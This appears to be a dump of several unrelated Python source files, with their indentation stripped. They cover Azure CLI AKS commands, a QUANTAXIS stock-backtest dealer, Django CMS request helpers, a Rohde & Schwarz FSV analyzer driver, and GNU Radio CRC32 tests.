g.command('stop', 'stop', supports_no_wait=True)
g.command('start', 'start', supports_no_wait=True)
with self.command_group('aks', container_services_sdk, client_factory=cf_container_services) as g:
g.custom_command('get-versions', 'aks_get_versions', table_transformer=aks_versions_table_format)
# AKS agent pool commands
with self.command_group('aks nodepool', agent_pools_sdk, client_factory=cf_agent_pools) as g:
g.custom_command('list', 'aks_agentpool_list', table_transformer=aks_agentpool_list_table_format)
g.custom_show_command('show', 'aks_agentpool_show', table_transformer=aks_agentpool_show_table_format)
g.custom_command('add', 'aks_agentpool_add', supports_no_wait=True)
g.custom_command('scale', 'aks_agentpool_scale', supports_no_wait=True)
g.custom_command('upgrade', 'aks_agentpool_upgrade', supports_no_wait=True)
g.custom_command('update', 'aks_agentpool_update', supports_no_wait=True)
g.custom_command('delete', 'aks_agentpool_delete', supports_no_wait=True)
g.custom_command('get-upgrades', 'aks_agentpool_get_upgrade_profile')
# OSA commands
with self.command_group('openshift', openshift_managed_clusters_sdk,
client_factory=cf_openshift_managed_clusters) as g:
g.custom_command('create', 'openshift_create', supports_no_wait=True)
g.command('delete', 'delete', supports_no_wait=True, confirmation=True)
g.custom_command('scale', 'openshift_scale', supports_no_wait=True)
g.custom_show_command('show', 'openshift_show')
g.custom_command('list', 'osa_list', table_transformer=osa_list_table_format)
g.wait_command('wait')
# OSA monitor subgroup
with self.command_group('openshift monitor', openshift_managed_clusters_sdk,
client_factory=cf_openshift_managed_clusters) as g:
g.custom_command('enable', 'openshift_monitor_enable', supports_no_wait=True)
g.custom_command('disable', 'openshift_monitor_disable', supports_no_wait=True)
|
py
|
1a5f15e3ff0081d50e656ae63303aabbb38193e8
|
# coding :utf-8
#
# The MIT License (MIT)
#
# Copyright (c) 2016-2018 yutiansut/QUANTAXIS
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#from .market_config import stock_market,future_market,HK_stock_market,US_stock_market
from QUANTAXIS.QAUtil import QA_util_log_info, QA_util_random_with_topic
from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, TRADE_STATUS
"""撮合类
输入是
self.market_data
self.order
rules
输出是
standard message
"""
class commission():
if_buyside_commission = False
if_sellside_commission = True
if_commission = if_buyside_commission and if_sellside_commission
class dealer_preset():
def __init__(self, market_type, *args, **kwargs):
self.market_type = market_type
self.if_price_limit = None # 是否限制涨跌停(美股/加密货币不限制)
self.if_commission = None # 是否收手续费(部分合约/部分加密货币不收手续费)
self.if_tax = None # 是否收税
self.if_t0 = None # 是否t+0
self.if_sellopen = None # 是否允许卖空
self.trading_time = None # 交易时间
self.commission_coeff = None # 手续费比例
self.tax_coeff = None # 费率
def load_preset(self):
if self.market_type is MARKET_TYPE.STOCK_CN:
self.if_price_limit = True # 是否限制涨跌停(美股/加密货币不限制)
self.if_commission = True # 是否收手续费(部分合约/部分加密货币不收手续费)
self.if_tax = True # 是否收税
self.if_t0 = False # 是否t+0
self.if_sellopen = False # 是否允许卖空
self.trading_time = [[930, 1130], [1300, 1500]] # 交易时间
self.commission_coeff = 0.00025 # 手续费比例
self.tax_coeff = 0.001 # 费率
return self
elif self.market_type is MARKET_TYPE.FUTURE_CN:
self.if_price_limit = True # 是否限制涨跌停(美股/加密货币不限制)
self.if_commission = True # 是否收手续费(部分合约/部分加密货币不收手续费)
self.if_tax = False # 是否收税
self.if_t0 = True # 是否t+0
self.if_sellopen = True # 是否允许卖空
self.trading_time = [[930, 1130], [1300, 1500]] # 交易时间
self.commission_coeff = 0.00025 # 手续费比例
self.tax_coeff = 0 # 费率
else:
pass
return self
class QA_Dealer():
"""[summary]
对于不同的市场规则:
股票市场 t+1
期货/期权/加密货币市场 t+0
股票/加密货币市场不允许卖空
期货/期权市场允许卖空
t+1的市场是
当日的买入 更新持仓- 不更新可卖数量- 资金冻结
当日的卖出 及时更新可用资金
t+0市场是:
当日买入 即时更新持仓和可卖
当日卖出 即时更新
卖空的规则是
允许无仓位的时候卖出证券(按市值和保证金比例限制算)
"""
def __init__(self, commission_fee_coeff=0.00025, tax_coeff=0.001, *args, **kwargs):
self.commission_fee_coeff = commission_fee_coeff
self.tax_coeff = tax_coeff
self.deal_name = ''
self.deal_engine = {'0x01': self.backtest_stock_dealer}
self.session = {}
self.order = None
self.market_data = None
self.commission_fee = None
self.tax = None
self.status = None
def deal(self, order, market_data):
self.order = order
self.market_data = market_data
self.deal_price = 0
self.deal_amount = 0
self.commission_fee_coeff=order.commission_coeff
self.tax_coeff=order.tax_coeff
if order.market_type is MARKET_TYPE.STOCK_CN:
return self.backtest_stock_dealer()
def callback_message(self):
# 这是标准的return back message
message = {
'header': {
'source': 'market',
'status': self.status,
'code': self.order.code,
'session': {
'user': self.order.user,
'strategy': self.order.strategy,
'account': self.order.account_cookie
},
'order_id': self.order.order_id,
'trade_id': QA_util_random_with_topic('Trade')
},
'body': {
'order': {
'price': float("%.2f" % float(self.deal_price)),
'code': self.order.code,
'amount': self.deal_amount,
'date': self.order.date,
'datetime': self.order.datetime,
'towards': self.order.towards
},
# 'market': {
# 'open': self.market_data.get('open'),
# 'high': self.market_data.get('high'),
# 'low': self.market_data.get('low'),
# 'close': self.market_data.get('close'),
# 'volume': self.market_data.get('volume'),
# 'code': self.market_data.get('code')
# },
'fee': {
'commission': self.commission_fee,
'tax': self.tax
}
}
}
return message
def cal_fee(self):
if self.order.market_type is MARKET_TYPE.STOCK_CN:
if int(self.order.towards) > 0:
commission_fee = self.commission_fee_coeff * \
float(self.deal_price) * float(self.order.amount)
self.commission_fee = 5 if commission_fee < 5 else commission_fee
self.tax = 0 # 买入不收印花税
else:
commission_fee = self.commission_fee_coeff * \
float(self.deal_price) * float(self.order.amount)
self.commission_fee = 5 if commission_fee < 5 else commission_fee
self.tax = self.tax_coeff * \
float(self.deal_price) * float(self.order.amount)
elif self.order.market_type is MARKET_TYPE.FUTURE_CN:
# 期货不收税
# 双边手续费 也没有最小手续费限制
self.commission_fee = self.commission_fee_coeff * \
float(self.deal_price) * float(self.order.amount)
#self.commission_fee = 5 if commission_fee < 5 else commission_fee
self.tax = 0 # 买入不收印花税
def backtest_stock_dealer(self):
# 新增一个__commission_fee_coeff 手续费系数
"""MARKET ENGINE STOCK
在拿到市场数据后对于订单的撮合判断 生成成交信息
trading system
step1: check self.market_data
step2: deal
step3: return callback
"""
try:
if float(self.market_data.get('open')) == float(self.market_data.get('high')) == float(self.market_data.get('close')) == float(self.market_data.get('low')):
self.status = TRADE_STATUS.PRICE_LIMIT
self.deal_price = 0
self.deal_amount = 0
self.cal_fee()
return self.callback_message()
elif ((float(self.order.price) < float(self.market_data.get('high')) and
float(self.order.price) > float(self.market_data.get('low'))) or
float(self.order.price) == float(self.market_data.get('low')) or
float(self.order.price) == float(self.market_data.get('high'))):
'能成功交易的情况 有滑点调整'
if float(self.order.amount) < float(self.market_data.get('volume')) * 100 / 16:
self.deal_price = self.order.price
self.deal_amount = self.order.amount
elif float(self.order.amount) >= float(self.market_data.get('volume')) * 100 / 16 and \
float(self.order.amount) < float(self.market_data.get('volume')) * 100 / 8:
"""
add some slippers
buy_price=mean(max{open,close},high)
sell_price=mean(min{open,close},low)
"""
if int(self.order.towards) > 0:
self.deal_price = (max(float(self.market_data.get('open')), float(
self.market_data.get('close'))) + float(self.market_data.get('high'))) * 0.5
else:
self.deal_price = (min(float(self.market_data.get('open')), float(
self.market_data.get('close'))) + float(self.market_data.get('low'))) * 0.5
self.deal_amount = self.order.amount
else:
self.deal_amount = float(self.market_data.get('volume')) / 8
if int(self.order.towards) > 0:
self.deal_price = float(self.market_data.get('high'))
else:
self.deal_price = float(self.market_data.get('low'))
self.cal_fee()
self.status = TRADE_STATUS.SUCCESS
return self.callback_message()
else:
self.status = TRADE_STATUS.FAILED
self.deal_price = 0
self.deal_amount = 0
self.cal_fee()
return self.callback_message()
except Exception as e:
QA_util_log_info('MARKET ENGINE ERROR: {}'.format(e))
self.status = TRADE_STATUS.NO_MARKET_DATA
return self.callback_message()
class Stock_Dealer(QA_Dealer):
def __init__(self, *args, **kwargs):
super().__init__()
if __name__ == '__main__':
pass
|
py
|
1a5f1790a76f2aae3222cafb9aff25c13fd50275
|
# -*- coding: utf-8 -*-
# TODO: this is just stuff from utils.py - should be splitted / moved
from cms.utils.i18n import get_default_language
from django.conf import settings
from django.core.urlresolvers import reverse
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
import urllib
def get_template_from_request(request, obj=None, no_current_page=False):
"""
Gets a valid template from different sources or falls back to the default
template.
"""
template = None
if len(settings.CMS_TEMPLATES) == 1:
return settings.CMS_TEMPLATES[0][0]
if "template" in request.REQUEST:
template = request.REQUEST['template']
if not template and obj is not None:
template = obj.get_template()
if not template and not no_current_page and hasattr(request, "current_page"):
current_page = request.current_page
if hasattr(current_page, "get_template"):
template = current_page.get_template()
if template is not None and template in dict(settings.CMS_TEMPLATES).keys():
if template == settings.CMS_TEMPLATE_INHERITANCE_MAGIC and obj:
# Happens on admin's request when changing the template for a page
# to "inherit".
return obj.get_template()
return template
return settings.CMS_TEMPLATES[0][0]
def get_language_from_request(request, current_page=None):
from cms.models import Page
"""
Return the most obvious language according the request
"""
language = request.REQUEST.get('language', None)
if language:
if not language in dict(settings.CMS_LANGUAGES).keys():
language = None
if language is None:
language = getattr(request, 'LANGUAGE_CODE', None)
if language:
if not language in dict(settings.CMS_LANGUAGES).keys():
language = None
# TODO: This smells like a refactoring oversight - was current_page ever a page object? It appears to be a string now
if language is None and isinstance(current_page, Page):
# in last resort, get the first language available in the page
languages = current_page.get_languages()
if len(languages) > 0:
language = languages[0]
if language is None:
# language must be defined in CMS_LANGUAGES, so check first if there
# is any language with LANGUAGE_CODE, otherwise try to split it and find
# best match
language = get_default_language()
return language
def get_page_from_request(request):
from warnings import warn
from cms.utils.page_resolver import get_page_from_request as new
warn("'cms.utils.get_page_from_request' is deprecated in favor of "
"'cms.utils.page_resolver.get_page_from_request' and will be removed "
"in Django-CMS 2.2.", DeprecationWarning)
return new(request)
|
py
|
1a5f190921b60820614639cd727170d94fc49298
|
from instrument import Instrument
from visa import VisaIOError
import visa
import types
import logging
import numpy as np
import qt
class FSV_Exception(Exception):
pass
class RhodeSchwartz_FSV(Instrument):
'''
This is the driver for the Rohde & Schwarz FSV Signal Analyzer.
Usage:
Initialize with
<name> = qt.instruments.create('<name>', 'RhodeSchwartz_FSV',
address='TCPIP::<IP-address>::INSTR',
reset=<bool>,)
For GPIB the address is: 'GPIB<interface_nunmber>::<gpib-address>'
'''
def __init__(self, name, address, reset=False):
# Initialize wrapper functions
logging.info('Initializing instrument Rhode & Schwarz FSV Signal Generator')
Instrument.__init__(self, name, tags=['physical'])
# Add some global constants
self._address = address
self._default_timeout = 2000 # ms
self._visainstrument = visa.ResourceManager().open_resource(self._address,
timeout=self._default_timeout)
self._freq_unit = 1
self._freq_unit_symbol = 'Hz'
# Add parameters
self.add_parameter('centerfrequency', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=10, maxval=13.6e9,
units='Hz')
self.add_parameter('span', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=0, maxval=13.6e9,
units='Hz')
self.add_parameter('referencelevel', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=-130, maxval=0,
units='dBm', format='%.04e')
self.add_parameter('mode', type=types.StringType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
format_map = {
"SAN" : "Spectrum",
"IQ" : "IQ Analyzer",
"PNO" : "Phase Noise"
})
self.add_parameter('continuous_sweep', type=types.BooleanType,
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET)
self.add_parameter('sweep_points', type=types.IntType,
flags=Instrument.FLAG_GETSET|Instrument.FLAG_GET_AFTER_SET,
minval=101, maxval=32001)
self.add_parameter('bandwidth', type=types.FloatType,
flags=Instrument.FLAG_GETSET | Instrument.FLAG_GET_AFTER_SET,
minval=1, maxval=10e6,
units='Hz', format='%d')
def get_instrument(self):
return self._visainstrument
def reset(self):
self._visainstrument.write('*RST')
def markers_to_peaks(self, no_of_peaks=3):
for i in range(8):
self._visainstrument.write('CALC:MARK%d OFF' % (i+1))
for i in range(no_of_peaks):
self._visainstrument.write('CALC:MARK%d ON' % (i+1))
def marker_to_max(self):
self.markers_to_peaks(1)
def set_marker_frequency(self, freq):
self._visainstrument.write('CALC:MARK1:X %dHz' % freq+';*WAI')
def set_markerN_frequency(self,n, freq):
self._visainstrument.write('CALC:MARK%d:X %dHz' %(n, freq))
def marker_next(self, marker=1):
if not int(self._visainstrument.query('CALC:MARK%d?' % (marker)).strip()):
raise FSV_Exception('Marker %d is not on' % (marker))
self._visainstrument.write('CALC:MARK%d:MAX:NEXT' % marker)
def get_max_freqs(self, no_of_peaks=3):
xvals = []
yvals = []
for i in range(no_of_peaks):
if not int(self._visainstrument.query('CALC:MARK%d?' % (i+1)).strip()):
raise FSV_Exception('Marker %d is not on' % (i+1))
xvals.append(float(self._visainstrument.query('CALC:MARK%d:X?' % (i+1)).strip()))
yvals.append(float(self._visainstrument.query('CALC:MARK%d:Y?' % (i+1)).strip()))
return xvals, yvals
# communication with machine
def do_get_centerfrequency(self):
'''
Get center frequency from device
Input:
None
Output:
centerfrequency (float) : center frequency in Hz
'''
logging.debug(__name__ + ' : reading center frequency from instrument')
return float(self._visainstrument.ask('FREQ:CENT?'))
def do_set_centerfrequency(self, centerfrequency):
'''
Set center frequency of device
Input:
centerfrequency (float) : center frequency in Hz
Output:
None
'''
logging.debug(__name__ + ' : setting center frequency to %s Hz' % centerfrequency)
self._visainstrument.write('FREQ:CENT %f' % centerfrequency+';*WAI')
def do_get_span(self):
'''
Get span from device
Input:
None
Output:
span (float) : span in Hz
'''
logging.debug(__name__ + ' : reading span from instrument')
return float(self._visainstrument.ask('FREQ:SPAN?'))
def do_set_span(self,span):
'''
Set span of device
Input:
span (float) : span in Hz
Output:
None
'''
logging.debug(__name__ + ' : setting span to %s Hz' % span)
self._visainstrument.write('FREQ:SPAN %e' % span)
def do_get_referencelevel(self):
'''
Get reference level from device
Input:
None
Output:
referencelevel (float) : reference level in dBm
'''
logging.debug(__name__ + ' : reading referencelevel from instrument')
return float(self._visainstrument.ask('DISP:TRAC:Y:RLEV?'))
def do_set_referencelevel(self,referencelevel):
'''
Set referencelevel of device
Input:
referencelevel (float) : reference level in dBm(??)
Output:
None
'''
logging.debug(__name__ + ' : setting referencelevel to %s dBm' % referencelevel)
self._visainstrument.write('DISP:TRAC:Y:RLEV %e' % referencelevel)
def do_get_mode(self):
'''
Get mode from device
Input:
None
Output:
mode (float) : reference level in dBm
'''
logging.debug(__name__ + ' : reading mode from instrument')
return self._visainstrument.ask('INST?').strip()
def do_set_mode(self,mode):
'''
Set mode of device
Input:
mode (float) : mode
Output:
None
'''
logging.debug(__name__ + ' : setting sweep_mode to %s' % mode)
self._visainstrument.write('INST %s' % mode)
def do_get_continuous_sweep(self):
'''
Get continuous_sweep from device
Input:
None
Output:
continuous_sweep (float) : reference level in dBm
'''
logging.debug(__name__ + ' : reading continuous_sweep from instrument')
return int(self._visainstrument.ask('INIT:CONT?').strip())
def do_set_continuous_sweep(self, continuous_sweep):
'''
Set continuous_sweep of device
Input:
continuous_sweep (float) : continuous_sweep
Output:
None
'''
logging.debug(__name__ + ' : setting continuous_sweep to %r' % continuous_sweep)
if continuous_sweep:
string = 'ON'
else:
string = 'OFF'
self._visainstrument.write('INIT:CONT %s' % string)
def do_get_sweep_points(self):
'''
Get sweep_points from device
Input:
None
Output:
sweep_points (float) : reference level in dBm
'''
logging.debug(__name__ + ' : reading sweep_points from instrument')
return int(self._visainstrument.ask('SWE:POIN?').strip())
def get_sweep_time(self):
'''
Get the sweep time in Seconds
'''
logging.debug(__name__ + ' : reading sweep_time from instrument')
return float(self._visainstrument.ask('SWE:TIME?').strip())
def do_set_sweep_points(self, sweep_points):
'''
Set sweep_points of device
Input:
sweep_points (float) : sweep_points
Output:
None
'''
logging.debug(__name__ + ' : setting sweep_points to %d' % sweep_points)
self._visainstrument.write('SWE:POIN %d' % sweep_points)
def do_get_bandwidth(self):
'''
Get bandwidth from device
Input:
None
Output:
bandwidth (float) : reference level in dBm
'''
logging.debug(__name__ + ' : reading bandwidth from instrument')
return int(self._visainstrument.ask('BAND?').strip())
def do_set_bandwidth(self, bandwidth):
'''
Set bandwidth of device
Input:
bandwidth (float) : bandwidth
Output:
None
'''
logging.debug(__name__ + ' : setting bandwidth to %d' % bandwidth)
self._visainstrument.write('BAND %d' % bandwidth)
def wait_till_complete(self):
try:
self._visainstrument.query('*ESR?')
self._visainstrument.write('*OPC')
sweeptime=self.get_sweep_time()*self.get_sweep_count()
qt.msleep(sweeptime-2.)
while int(self._visainstrument.query('*ESR?').strip())%2==0:
qt.msleep(0.1)
except VisaIOError:
print ('FSV timed out. It may be preparing the sweep.\nPress enter to start the sweep.')
raw_input()
self.run_single(wait=True)
except KeyboardInterrupt:
raise Exception('Interrupted in middle of sweep')
def get_data(self):
logging.debug(__name__ + ' : fetching data')
center = self.get_centerfrequency()
span = self.get_span()
npoints = self.get_sweep_points()
#self.run_single(wait=True)
xvals = np.linspace(center-span/2.0, center+span/2.0, npoints)
yvals = self._visainstrument.query('TRAC? TRACE1').split(',')
yvals = map(float,yvals)
return xvals, yvals
def run_single(self, wait=False):
'''
Trigger a single Sweep
'''
self._visainstrument.write('INIT:CONT OFF')
self._visainstrument.write('INIT;*WAI')
if wait:
self.wait_till_complete()
def set_sweep_mode_avg(self, mode = 'LIN'):
logging.debug(__name__ + ' : setting mode to AVG')
self._visainstrument.write('DISP:TRAC:MODE AVER')
self._visainstrument.write('SENS:AVER:TYPE %s'%mode)
def set_sweep_count(self, counts):
logging.debug(__name__ + ' : setting sweep count to %d'%counts)
self._visainstrument.write('SWE:COUN %s'%counts)
def get_sweep_count(self):
# logging.debug(__name__ + ' : setting sweep count to %d'%counts)
return int(self._visainstrument.ask('SWE:COUN?'))
def w(self, string):
return self._visainstrument.write(string)
|
py
|
1a5f198ad80f484ece25738b53539f2a52d81482
|
#!/usr/bin/env python
# Copyright 2012-2014 Free Software Foundation, Inc.
#
# This file is part of GNU Radio
#
# GNU Radio is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3, or (at your option)
# any later version.
#
# GNU Radio is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with GNU Radio; see the file COPYING. If not, write to
# the Free Software Foundation, Inc., 51 Franklin Street,
# Boston, MA 02110-1301, USA.
#
from gnuradio import gr, gr_unittest, blocks, digital
import pmt
class qa_crc32_bb(gr_unittest.TestCase):
def setUp(self):
self.tb = gr.top_block()
self.tsb_key = "length"
def tearDown(self):
self.tb = None
def test_001_crc_len(self):
""" Make sure the output of a CRC set is 4 bytes longer than the input. """
data = range(16)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(
src,
blocks.stream_to_tagged_stream(gr.sizeof_char, 1,
len(data), self.tsb_key), crc, sink)
self.tb.run()
# Check that the packets before crc_check are 4 bytes longer that the input.
self.assertEqual(len(data) + 4, len(sink.data()[0]))
def test_002_crc_equal(self):
""" Go through CRC set / CRC check and make sure the output
is the same as the input. """
data = (0, 1, 2, 3, 4, 5, 6, 7, 8)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key)
crc_check = digital.crc32_bb(True, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
crc_check, sink)
self.tb.run()
# Check that the packets after crc_check are the same as input.
self.assertEqual(data, sink.data()[0])
def test_003_crc_correct_lentag(self):
tag_name = "length"
pack_len = 8
packets = range(pack_len * 2)
tag1 = gr.tag_t()
tag1.offset = 0
tag1.key = pmt.string_to_symbol(tag_name)
tag1.value = pmt.from_long(pack_len)
tag2 = gr.tag_t()
tag2.offset = pack_len
tag2.key = pmt.string_to_symbol(tag_name)
tag2.value = pmt.from_long(pack_len)
testtag1 = gr.tag_t()
testtag1.offset = 1
testtag1.key = pmt.string_to_symbol("tag1")
testtag1.value = pmt.from_long(0)
testtag2 = gr.tag_t()
testtag2.offset = pack_len
testtag2.key = pmt.string_to_symbol("tag2")
testtag2.value = pmt.from_long(0)
testtag3 = gr.tag_t()
testtag3.offset = len(packets) - 1
testtag3.key = pmt.string_to_symbol("tag3")
testtag3.value = pmt.from_long(0)
src = blocks.vector_source_b(packets, False, 1,
(testtag1, testtag2, testtag3))
crc = digital.crc32_bb(False, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, pack_len, self.tsb_key), crc,
sink)
self.tb.run()
self.assertEqual(len(sink.data()), 2)
self.assertEqual(len(sink.data()[0]), (pack_len + 4))
self.assertEqual(len(sink.data()[1]), (pack_len + 4))
correct_offsets = {'tag1': 1, 'tag2': 12, 'tag3': 19}
tags_found = {'tag1': False, 'tag2': False, 'tag3': False}
for tag in sink.tags():
key = pmt.symbol_to_string(tag.key)
if key in correct_offsets.keys():
tags_found[key] = True
self.assertEqual(correct_offsets[key], tag.offset)
self.assertTrue(all(tags_found.values()))
def test_004_fail(self):
""" Corrupt the data and make sure it fails CRC test. """
data = (0, 1, 2, 3, 4, 5, 6, 7)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key)
crc_check = digital.crc32_bb(True, self.tsb_key)
corruptor = blocks.add_const_bb(1)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
corruptor, crc_check, sink)
self.tb.run()
# crc_check will drop invalid packets
self.assertEqual(len(sink.data()), 0)
def test_005_tag_propagation(self):
""" Make sure tags on the CRC aren't lost. """
# Data with precalculated CRC
data = (0, 1, 2, 3, 4, 5, 6, 7, 8, 2, 67, 225, 188)
testtag = gr.tag_t()
testtag.offset = len(data) - 1
testtag.key = pmt.string_to_symbol('tag1')
testtag.value = pmt.from_long(0)
src = blocks.vector_source_b(data, False, 1, (testtag, ))
crc_check = digital.crc32_bb(True, self.tsb_key)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_check, sink)
self.tb.run()
self.assertEqual([len(data) - 5, ], [
tag.offset for tag in sink.tags()
if pmt.symbol_to_string(tag.key) == 'tag1'
])
# NOTE: What follows are the same tests as before but with the packed flag set to False
def test_006_crc_len(self):
""" Make sure the output of a CRC set is 32 (unpacked) bytes longer than the input. """
data = range(16)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(
src,
blocks.stream_to_tagged_stream(gr.sizeof_char, 1,
len(data), self.tsb_key), crc, sink)
self.tb.run()
# Check that the packets before crc_check are 4 bytes longer that the input.
self.assertEqual(len(data) + 32, len(sink.data()[0]))
def test_007_crc_equal(self):
""" Go through CRC set / CRC check and make sure the output
is the same as the input. """
data = (0, 1, 2, 3, 4, 5, 6, 7, 8)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key, False)
crc_check = digital.crc32_bb(True, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
crc_check, sink)
self.tb.run()
# Check that the packets after crc_check are the same as input.
self.assertEqual(data, sink.data()[0])
def test_002_crc_equal_unpacked(self):
""" Test unpacked operation with packed operation
"""
data = (0, 1, 2, 3, 4, 5, 6, 7, 8)
src = blocks.vector_source_b(data)
unpack1 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
unpack2 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
crc_unpacked = digital.crc32_bb(False, self.tsb_key, False)
crc_packed = digital.crc32_bb(False, self.tsb_key, True)
sink1 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
sink2 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_packed, unpack1, sink1)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
unpack2, crc_unpacked, sink2)
self.tb.run()
self.assertEqual(sink1.data(), sink2.data())
def test_003_crc_equal_unpacked(self):
""" Test unpacked operation with packed operation
"""
data = range(35)
src = blocks.vector_source_b(data)
unpack1 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
unpack2 = blocks.repack_bits_bb(8, 1, self.tsb_key, False,
gr.GR_LSB_FIRST)
crc_unpacked = digital.crc32_bb(False, self.tsb_key, False)
crc_packed = digital.crc32_bb(False, self.tsb_key, True)
sink1 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
sink2 = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
crc_packed, unpack1, sink1)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key),
unpack2, crc_unpacked, sink2)
self.tb.run()
self.assertEqual(sink1.data(), sink2.data())
def test_008_crc_correct_lentag(self):
tag_name = "length"
pack_len = 8
packets = range(pack_len * 2)
tag1 = gr.tag_t()
tag1.offset = 0
tag1.key = pmt.string_to_symbol(tag_name)
tag1.value = pmt.from_long(pack_len)
tag2 = gr.tag_t()
tag2.offset = pack_len
tag2.key = pmt.string_to_symbol(tag_name)
tag2.value = pmt.from_long(pack_len)
testtag1 = gr.tag_t()
testtag1.offset = 1
testtag1.key = pmt.string_to_symbol("tag1")
testtag1.value = pmt.from_long(0)
testtag2 = gr.tag_t()
testtag2.offset = pack_len
testtag2.key = pmt.string_to_symbol("tag2")
testtag2.value = pmt.from_long(0)
testtag3 = gr.tag_t()
testtag3.offset = len(packets) - 1
testtag3.key = pmt.string_to_symbol("tag3")
testtag3.value = pmt.from_long(0)
src = blocks.vector_source_b(packets, False, 1,
(testtag1, testtag2, testtag3))
crc = digital.crc32_bb(False, self.tsb_key, False)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, pack_len, self.tsb_key), crc,
sink)
self.tb.run()
self.assertEqual(len(sink.data()), 2)
self.assertEqual(len(sink.data()[0]), (pack_len + 32))
self.assertEqual(len(sink.data()[1]), (pack_len + 32))
correct_offsets = {'tag1': 1, 'tag2': 8 + 32, 'tag3': 15 + 32}
tags_found = {'tag1': False, 'tag2': False, 'tag3': False}
for tag in sink.tags():
key = pmt.symbol_to_string(tag.key)
if key in correct_offsets.keys():
tags_found[key] = True
self.assertEqual(correct_offsets[key], tag.offset)
self.assertTrue(all(tags_found.values()))
def test_009_fail(self):
""" Corrupt the data and make sure it fails CRC test. """
data = (0, 1, 2, 3, 4, 5, 6, 7)
src = blocks.vector_source_b(data)
crc = digital.crc32_bb(False, self.tsb_key, False)
crc_check = digital.crc32_bb(True, self.tsb_key, False)
corruptor = blocks.add_const_bb(1)
sink = blocks.tsb_vector_sink_b(tsb_key=self.tsb_key)
self.tb.connect(src,
blocks.stream_to_tagged_stream(
gr.sizeof_char, 1, len(data), self.tsb_key), crc,
corruptor, crc_check, sink)
self.tb.run()
# crc_check will drop invalid packets
self.assertEqual(len(sink.data()), 0)
def test_0010_tag_propagation(self):
""" Make sure tags on the CRC aren't lost. """
# Data with precalculated CRC
data = (0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0,
0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0, 1, 0,
1, 0, 0, 0, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1, 1, 0, 0, 0, 0,
